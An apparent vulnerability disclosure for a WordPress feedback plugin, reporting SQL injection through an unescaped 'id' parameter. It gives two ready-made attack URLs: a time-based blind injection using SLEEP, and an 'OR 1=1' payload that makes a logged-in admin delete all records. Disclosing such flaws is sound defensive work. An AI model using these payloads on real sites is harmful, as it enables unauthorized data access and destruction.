The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues
https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29
Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1